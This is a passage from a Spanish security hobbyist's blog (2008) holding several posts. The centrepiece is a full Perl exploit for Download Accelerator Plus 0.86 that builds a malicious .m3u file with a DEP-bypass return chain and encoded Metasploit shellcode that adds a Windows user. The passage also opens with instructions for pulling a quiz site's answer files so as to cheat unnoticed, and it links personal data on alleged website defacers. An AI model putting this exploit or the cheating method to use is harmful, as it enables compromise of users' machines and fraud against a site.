Ahora nos fijamos aquí: Obj1.load("./" +_root.ram + "/" + das + ".txt", 0); -- esto quiere decir que en donde actualmente está el .swf, www.futbolreto.com/login , hay una / y carga las categorías que son 5 (_root.ram) y luego otra / y carga el número de preguntas y lo pone como .txt por lo que quedaría así “www.futbolreto.com/login/1/1.txt” y como tiene 5 categorías hasta aquí www.futbolreto.com/login/5/1.txt y lo que es el 1.txt(das) varia hasta muchos números, así que vamos probando y guardamos las respuestas.
Y aquí termina este documento, podréis hacer vosotros vuestras pruebas y si queréis ganar, sin que se note mucho, aunque ya no hay premios porque hace tiempo que mi amigo informó y los quitaron y el fallo siguen sin arreglarlo.
Actualmente hay más páginas con este tipo de vulnerabilidades que muestran información sensible y que hace posible el poder saltarse las reglas.

Hecho por: Trancek, trancek@p1mp4m.es

martes, 29 de abril de 2008

Menudo mes viene - Mayo

Últimamente tengo poco tiempo para postear por aquí, por P1MP4M.es, yashira.org y en la lista tan buena de cracklatinos, y todo debido al instituto principalmente, aunque también a otros asuntos, así que durante el mes de Mayo, mes de exámenes, estaré desaparecido por estos lugares.

A ver si para el 21 de Mayo me va todo bien, y me tomo las vacaciones más largas de la vida jeje, y a aprovechar a buscar vulnerabilidades pero sobretodo a aprender Ing Inversa, o quien sabe tal vez me ponga algo con las inyecciones que soy bastante paquete.

Ale el que quiera algo que me diga por msn si me pilla o que me mande un mail, taluegooooo

domingo, 20 de abril de 2008

El final de hakin9 en español

Me acabo de acordar de una noticia la cual creo que no está en ningún sitio o al menos yo no lo vi y es que resulta que hakin9 en español desaparece después de años ofreciendo buena información tanto teórica como práctica. No se si la empresa se habrá pronunciado pero al tratar de hablar con ellos para ponerme a escribir un artículo, me contestaron y la contestación fue clara y precisa, la edición española de hakin9 ya no va a salir, así que toca recopilar todas las revistas hasta el momento.

Por lo que una de las últimas entregas es la de Enero creo, del 2008, en la que el señor xD Chema habla de sql injection con consultas pesadas, y además tambien una recopilación de artículos para principantes.

Primero desaparece HackXCrack y ahora Hakin9, con que revistas de hacking en español nos vamos a quedar?? :(

jueves, 3 de abril de 2008

Lugares donde trabajar

Después de estar participando en sitios haciendo retos, o intentándolos, moviéndome un poco en este mundillo he estado mirando varios sitios donde molaría trabajar. Como "ingeniero inverso" principalmente, auditorías, etc. Aunque en temas de vulnerabilidades está más centrado fuera de España, como Core, TippingPoint, etc, por aquí en algún trabajo creo que también hay, aunque ni idea porque nunca fui currante. A ver si alguno que sepa se pasa por aquí y me dice o me deja un comentario sobre el trabajo que tienen que hacer en distintos puestos :P.

En Madrid hay un número de empresas que se dedican a ello, aunque fuera también(Que sepan que no es publicidad ya que no trabajé en ninguna pero por su gente me parece que tiene nivel o que está interesante).

-Informatica 64 - Con su querido Chema Alonso y Microsoft xDD, Pedro Laguna...
-S21sec - Buena gente ha trabajado ahí, y actualmente mikel gastesi.
-SIA - Andrés Tarasco y Alejandro Ramos, etc.
-Ecija

Málaga:

-HispaSec

Barcelona:

-ISecAuditors

Otros:
La gente de 48bits creo que trabaja de forma independiente pero se ve que son bastante buenos también.

A ver si a partir de verano aprendo más de ingenieria inversa y consigo algo jeje, que va siendo hora y sino a seguir buscando vulns xD.

Saludos a todos

Editado.

miércoles, 19 de marzo de 2008

Download Accelerator Plus(DAP), + DEP (Data Execution Prevention)

Ahi os dejo el exploit para que veais como poder desactivar esa proteccion tan maja que trae el windows xp sp2(activada por defecto para pocos procesos como explorer y desactivada para todo lo demas) y el windows 2003(activada para todo por defecto).

Link de descarga del tutorial

PD:Decir que funciona aunque DEP este desactivado tambien

#!/usr/bin/perl
################################################################################
#####################################
#
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;

print "Download Accelerator Plus (DAP) 0.86 .m3u Exploit\n\n";


$localhost = "http://localhost/";
$junk = "\x90" x 14115; #Hasta el Ret
$moval1 = "\x80\x20\x96\x7C"; #mov al,1 --> ntdll.dll(xp sp2 spanish)
$padding1 = "\x90" x 4; #NOP
$especialret = "\x94\x11\x91\x7C"; #mov ebp,esp(+codigo hasta ret) --> ntdll.dll(xp sp2 spanish)
$padding2 = "\x90" x 8; #NOP
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)
$cpmal1 = "\xF8\xD3\x92\x7C"; #cmp al,1 --> ntdll.dll(xp sp2 spanish)
$nopeando = "\x90" x 20; #NOP


# win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57".
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46".
"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36".
"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36".
"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37".
"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44".
"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42".
"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36".
"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46".
"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37".
"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52".
"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";


open(m3u, ">./vulnerable.m3u");
print m3u "$localhost";
print m3u "$junk";
print m3u "$moval1";
print m3u "$padding1";
print m3u "$especialret";
print m3u "$padding2";
print m3u "$ret";
print m3u "$cpmal1";
print m3u "$nopeando";
print m3u "$shellcode";

print "Instrucciones: El usuario tiene que pulsar el boton verificar. \n";
print "Con este exploit puede saltarse el DEP de Windows XP SP2\n\n";
print "Archivo creado\n";

domingo, 2 de marzo de 2008

Deface a Izquierda Unida

Hoy al medio dia mientra veo Antena 3, hay una noticia que me llama la atención, izquierda unida ha sido "hackeada" por "hackers", definicion no bien dada ya que si no me confundo no superan seguramente los 20 años ni los conocimientos de los grandes, son más bien los defacers y que les ha pasado lo peor que les puede pasar, que se haga público y llamativa la noticia y por lo tanto, que tomen medidas en el asunto, como bien leo en elpais:
--------------------------------------
Según miembros del equipo técnico de IU, los 'hackers' han conseguido saltarse las medidas de seguridad y se han apoderado de la máquina que da alojamiento a la página, a la vez custodiada por una empresa puntera en Europa en suministrar servicios de Internet. "No son unos aficionados. Se han saltado todos nuestros filtros y controlan la máquina desde sus propios ordenadores. Nuestros técnicos están trabajando para solucionar el problema, pero es muy serio", dijo Francisco José Mendi.

Izquierda Unida presentará una denuncia ante la Policía encargada de los 'cyberdelitos'. Para el responsable de comunicación de IU no hay ninguna duda de que se trata de "un ataque político", que podría ser obra de "algún grupo de ultraderecha camuflado de anarquistas".

--------------------------------------

Al leer lo primero y conocer el antiguo grupo de DOM Team un poco pensé...son buenos pero tanto como para saltarse todos sus filtros?? Yo creo que habrá sido un poco de inyección SQL o vete tu a saber, algun password por defecto o cualquier otro bug a nivel web, pero muchos filtros no tendrían..pero bueno y lo 2º, es lo que viene a veces, esta vez creo que si le quieren pillar le pillan, porque hay alguno español me parece y además dejan sus datos a la vista de todos. Pero bueno deberian protegerse más y dejarse de gastar el dinero y tiempo en buscar a la gente que lo hace, que en protegerse para que no pase nada.

Ahi dejo cosas para que vean lo facil que es ver algo por internet, y que si quieren no creo que tarden mucho ya que en algun lado de internet han dejado su ip verdadera o tal vez hasta nombre real. Solo es cuestion de tiempo y dinero.

Datos:
http://whois.domaintools.com/domlabs.org
http://www.spanish-hackers.com/users/ka0x.txt

Blog:
http://buclenoapto.wordpress.com/
http://xarnuz.wordpress.com/

Sobre DOM Team:
http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,D.O.M/


PD: Respecto a este comentario:
-----
Para el responsable de comunicación de IU no hay ninguna duda de que se trata de "un ataque político", que podría ser obra de "algún grupo de ultraderecha camuflado de anarquistas".
-----

Yo creo que lo dice para que se haga notar IU nada más, lo hacen con cualquier partido y cualquier página, no creo que hayan elegido IU por ser IU, cuanta consipiracion...un grupo de ultraderechas camuflado de anarquistas...revisen los ataques diarios y veran como eso no importa xDD.


Noticia:
http://www.elmundo.es/elmundo/2008/03/02/eleccionesgenerales/1204457114.html

martes, 12 de febrero de 2008

A la carga con los exploits

El taller ya lo abrí para irse iniciando, decir que aunque está un poco chapuza, espero que no tengan problemas y aprendan mucho, todos los post del foro se irán actualizando a medida que haya más información, corrección de fallos, links que falta poner, software que analizar, etc.

Así que espero que se animen y aprendan que es un tema bastante bonito jejej

Os espero a todos los que se animen y quieran compartir y aprender

Saludos y suerte


Link:http://www.p1mp4m.es/index.php?showforum=28

miércoles, 23 de enero de 2008

Taller de Buffer Overflow

Una idea que tenía hace tiempo y que me precipité al intentar hacerlo sin mucha experiencia, y ahora aunque no domino el tema, me gustaría empezar a enseñar para seguir los pasos de quienes nos enseñan en este mundillo, para ello se empezará desde lo más bajo y se irá subiendo el nivel. Espero que esto coja fuerza y sean unos cuantos los que se apunten y se interesen, además con un poco de suerte, quien sabe, tal vez terminemos todos dominando el tema antes de lo que pensabamos, pero claro para ello hay que saber bastantes cosas y lleva tiempo. Así que nada, quien quiera apuntarse, que se diriga a http://www.p1mp4m.es/index.php?showtopic=65 y se apunte u opine cualquier cosilla.

Espero que os guste el tema y cuando comience aprendais tanto como yo estoy aprendiendo y mas!!!